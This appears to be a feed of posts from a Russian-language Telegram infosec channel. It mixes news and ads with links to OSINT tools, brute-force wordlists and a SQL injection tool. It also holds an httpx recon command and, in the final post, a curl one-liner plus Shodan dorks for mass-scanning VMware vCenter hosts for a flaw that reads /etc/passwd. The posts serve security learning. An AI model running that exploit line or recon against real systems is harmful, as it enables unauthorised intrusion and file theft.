White Hat

Поговорим о кибербезопасности? О том, как защитить Linux-инфраструктуру от атак. О том, как посмотреть на код под новым углом и расширить горизонт находок. О том, как развиваться и оставаться в кибербезопасной форме. Поговорим! На Avito Security Meetup 1 августа в 19:00 мск. Успейте забронировать место на офлайн-встрече в московском офисе Авито: Для тех, кто приехать не сможет, будет организован прямой эфир. Готовьте вопросы — ответим в live-режиме. Реклама. ООО «Авито Тех». LdtCKZppL

📨 Tosint (Telegram OSINT) — Инструмент для извлечения информации из телеграмм-ботов и связанных с ними каналов. Возможности: • Получение информации о боте (имя, имя пользователя, идентификатор пользователя, статус); • Получение информации о чате (название, тип, идентификатор, имя пользователя, пригласительная ссылка); • Создание пригласительной ссылки; • Получение обновлений (последние сообщения, отправленные в чат); • Получение количества пользователей в чате; • Получение информации об администраторах чата. 💬 Ссылка на GitHub #OSINT #infosec #Telegram

👁 В Японии городские камеры с ИИ будут предотвращать преступления до их совершения Камеры с ИИ будут находить людей с подозрительным повадками в поведении: частое оглядывание вокруг, «бегающий» взгляд и тд. Также камеры «увидят» оружие. Заявляется, что их будут использовать только для защиты высокопоставленных VIP-персон #news

Обратный поиск по электронной почте Epieos — это поисковая система, которая позволяет выполнять обратный поиск по электронной почте, находить похожие в Google и видеть, какие веб-сайты связаны с каким-либо адресом электронной почты. 💬 Ссылка на инструмент #OSINT #email

📚 Легендарная серия книг, которые переведены на русский язык: • Занимайся хакингом как легенда. • Занимайся хакингом с ловкостью Бога. • Занимайся хакингом с ловкостью порнозвезды. • Занимайся расследованием киберпреступлений как рок-звезда. #ru #infosec #pentest

✈️ Мессенджер Telegram начал собирать IP-адреса пользователей, у которых нет премиум-подписки Администрация Telegram проинформировала пользователей об обновлении рекламной политики. Уточняется, что за счет собранных IP-адресов пользователей, которые не оформили премиум-подписку, будет осуществляться таргетинг рекламы. Отмечается, что сбор пользовательских IP-адресов позволит рекламодателям демонстрировать объявления в определенных странах и населенных пунктах. В администрации мессенджера подчеркнули, что никакая другая геолокационная информация пользователей для этих целей не собирается и не используется. Отдельно администрация мессенджера Telegram заявила, что соответствующие изменения коснутся исключительно тех пользователей, которые не оформили премиум-подписку. Поэтому любые данные, в том числе IP-адреса, у пользователей с имеющейся подпиской собираться не будут. #news

Журнал «Код» — это база для начинающих программистов. Отвечаем на самые простые вопросы и делимся мудростью.  Подписаться: @thecodemedia Реклама. ООО "ЯНДЕКС". ИНН 7736207543. erid: 2RanykDhiNU

📖 passphrase-wordlist Этот проект включает в себя огромный список фраз для брута сложных паролей (более 20 миллионов) и два файла правил #hashcat. Правила создадут более 1000 вариантов каждой фазы. 🗄 Ссылка на репозиторий #soft #infosec

no system is safe - Уроки по хакингу. Канал c инструкциями по взлому, деанону, социальной инженерии и бесплатными курсами от пентестеров

❤‍🔥 Умер Кевин Митник, самый известный хакер в мире 16 июля 2023 года скончался Кевин Митник, бывший хакер, который когда-то был одним из самых разыскиваемых компьютерных преступников в Соединенных Штатах. Об этом в среду сообщили компания по обучению кибербезопасности, которую он соосновал. Ему было 59 лет. #news

⚫ Полезные списки слов для брутфорса Небольшая подборка полезных генераторов и списков слов с GitHub: 💬 https://github.com/danielmiessler/SecLists 💬 https://github.com/berzerk0/Probable-Wordlists 💬 https://github.com/govolution/betterdefaultpasslist 💬 https://github.com/insidetrust/statistically-likely-usernames 💬 https://github.com/LandGrey/pydictor 💬 https://github.com/sc0tfree/mentalist 💬 https://github.com/skahwah/wordsmith 💬 https://github.com/1N3/IntruderPayloads 💬 https://github.com/fuzzdb-project/fuzzdb 💬 https://github.com/Bo0oM/fuzz.txt 💬 https://github.com/laconicwolf/Password-Scripts 💬 https://github.com/FlameOfIgnis/Pwdb-Public #Web #Wordlist

⚫️ Полезные списки слов для брутфорса Небольшая подборка полезных генераторов и списков слов с GitHub: 💬 https://github.com/danielmiessler/SecLists 💬 https://github.com/berzerk0/Probable-Wordlists 💬 https://github.com/govolution/betterdefaultpasslist 💬 https://github.com/insidetrust/statistically-likely-usernames 💬 https://github.com/LandGrey/pydictor 💬 https://github.com/sc0tfree/mentalist 💬 https://github.com/skahwah/wordsmith 💬 https://github.com/1N3/IntruderPayloads 💬 https://github.com/fuzzdb-project/fuzzdb 💬 https://github.com/Bo0oM/fuzz.txt 💬 https://github.com/laconicwolf/Password-Scripts 💬 https://github.com/FlameOfIgnis/Pwdb-Public #Web #Wordlist

🔄 Веб-службы на нестандартных портах Чтобы находить больше целей для поиска уязвимостей, следует проверять не только стандартные веб порты (80 и 443), но и нестандартные, такие как 8080, 10000, 8443 и другие, на которых могут располагаться веб-службы. Если провести некоторый анализ Shodan и имеющихся там веб-служб, работающих на нестандартных портах, то можно выделить некоторый список наиболее распространённых портов, которые следует проверять во время фазы разведки: httpx -l targets.list -p 8080,10000,20000,2222,7080,9009,7443,2087,2096,8443,4100,2082,2083,2086,9999,2052,9001,9002,7000,7001,8082,8084,8085,8010,9000,2078,2080,2079,2053,2095,4000,5280,8888,9443,5800,631,8000,8008,8087,84,85,86,88,10125,9003,7071,8383,7547,3434,10443,8089,3004,81,4567,7081,82,444,1935,3000,9998,4433,4431,4443,83,90,8001,8099,80,300,443,591,593,832,981,1010,1311,2480,3128,3333,4243,4711,4712,4993,5000,5104,5108,6543,7396,7474,8014,8042,8069,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8500,8834,8880,8983,9043,9060,9080,9090,9091,9200,9800,9981,12443,16080,18091,18092,20720,28017 -o livesites.result #Web #Recon

Чтобы закрепить теоретические знания, нужно практиковаться ⚙️ Admin Guides — инструкции по настройке серверов и программ. Вы научитесь настраивать: ➖ Системы мониторинга ➖ Базы данных ➖ Web-сервера ➖ Proxy ➖ VPN И многое другое… Подпишись на канал https://t.me/admguides

⚫️ Что такое XXE Injection? PortSwigger Внедрение внешнего объекта XML (XXE) — не самая распространенная, но зачастую критическая уязвимость. Она позволяет вмешиваться в обработку XML-данных веб-приложением. Знаете ли вы, что кроме извлечения файлов, XXE можно использовать для выполнения SSRF-атак, скрытой эксфильтрации данных и извлечения данных с помощью сообщений об ошибках. 🗄 Подробнее #XXE

⌨️ Продвинутые специализации в сфере ИБ | ИНФОБЕЗДНА В этом видео мы с вами разберем остальные специализации, которые существуют в ИБ. Вы узнаете кто такие фиолетовая, зеленая, желтая, оранжевая и белая команды, а также узнаете какие специалисты входят в эти направления и что они делают. 🗄 Смотреть на YouTube #Cybersecurity #Video

🔍 ghauri — инструмент для автоматизации обнаружения и эксплуатации SQL-инъекций. Усовершенствованный кроссплатформенный инструмент, который автоматизирует процесс обнаружения и использования уязвимостей безопасности SQL-инъекций. 🗄 Ссылка на репозиторий #Tools #BugBounty #Pentest

В поисках надежного корпоративного файрвола следующего поколения в условиях импортозамещения? Регистрируйтесь на вебинар «Межсетевые экраны нового поколения в 2023: что выбрать?», который пройдёт 2 августа в 12:00. На вебинаре расскажем: 🔹 Как поменялся рынок сетевой безопасности к 2023 году и что ждёт его в 2024? 🔹 Модельный ряд, лицензирование и варианты поставки UserGate, Континент 4, IdecoUTM, Sangfor и Check Point. 🔹 Демонстрация работы межсетевых экранов UserGate, Континент 4 и Sangfor 🔹 Ответим на ваши вопросы. Регистрируйтесь на вебинар «Межсетевые экраны нового поколения в 2023: что выбрать?» Реклама. ООО "ИНФРАТЕХ". ИНН 5024197250. erid: 2Ranym1cyje

🟦 LFI, SSRF и XSS в VMware vCenter В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет. Для поиска уязвимых хостов можно использовать однострочник: cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done Дорк, который можно использовать для поиска в Shodan: http.title:"ID_VC_Welcome" Для поиска в Zoomeye: app:"VMware vCenter" #LFI #SSRF #XSS